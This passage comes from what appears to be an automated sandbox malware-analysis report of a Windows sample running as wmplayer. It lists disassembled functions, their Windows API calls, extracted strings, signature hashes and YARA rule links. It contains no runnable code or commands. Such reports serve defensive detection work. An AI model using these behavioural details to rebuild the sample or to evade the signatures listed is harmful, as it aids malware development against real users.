                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 4173585201-1821301763
                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                            Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 4066108131-3849865405
                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                            Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memset.MSVCRT ref: 00408362
                                                                                            • memset.MSVCRT ref: 00408377
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 290601579-0
                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                            Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3592753638-3916222277
                                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                            • String ID: %s (%s)$YV@
                                                                                            • API String ID: 3979103747-598926743
                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                            • API String ID: 2767993716-572158859
                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                            Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 3176057301-2039793938
                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                            • database is already attached, xrefs: 0042F721
                                                                                            • out of memory, xrefs: 0042F865
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                            • API String ID: 1297977491-2001300268
                                                                                            • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                            • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                            Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                            • String ID: ($d
                                                                                            • API String ID: 1140211610-1915259565
                                                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                            Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3015003838-0
                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                            Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                            • free.MSVCRT ref: 004185AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                            • String ID:
                                                                                            • API String ID: 2802642348-0
                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                            Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                            • String ID: 3A
                                                                                            • API String ID: 3300951397-293699754
                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                            • String ID: strings
                                                                                            • API String ID: 3166385802-3030018805
                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                            Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                            • String ID: AE$.cfg$General$EA
                                                                                            • API String ID: 776488737-1622828088
                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                            Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                            • memset.MSVCRT ref: 0040D906
                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 1028950076-4169760276
                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                            Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: -journal$-wal
                                                                                            • API String ID: 438689982-2894717839
                                                                                            • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                            • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                            Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3975816621-0
                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
